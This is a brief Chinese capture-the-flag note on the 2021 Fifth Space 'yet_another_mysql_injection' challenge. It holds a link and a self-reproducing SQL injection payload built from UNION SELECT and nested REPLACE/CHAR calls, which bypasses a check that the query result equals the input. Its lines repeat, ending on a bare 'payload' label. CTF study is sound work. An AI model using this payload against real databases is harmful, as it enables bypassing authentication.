c1oud
昂波利玻玻
December 1st, 2021
绕过查询后的值需要和你输入的值一致
(https://blogbuyi.com/2021/10/10/2021-第五空间智能安全大赛-web-yet_another_mysql_injection/)
payload
1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#
绕过查询后的值需要和你输入的值一致
(https://blogbuyi.com/2021/10/10/2021-第五空间智能安全大赛-web-yet_another_mysql_injection/)
payload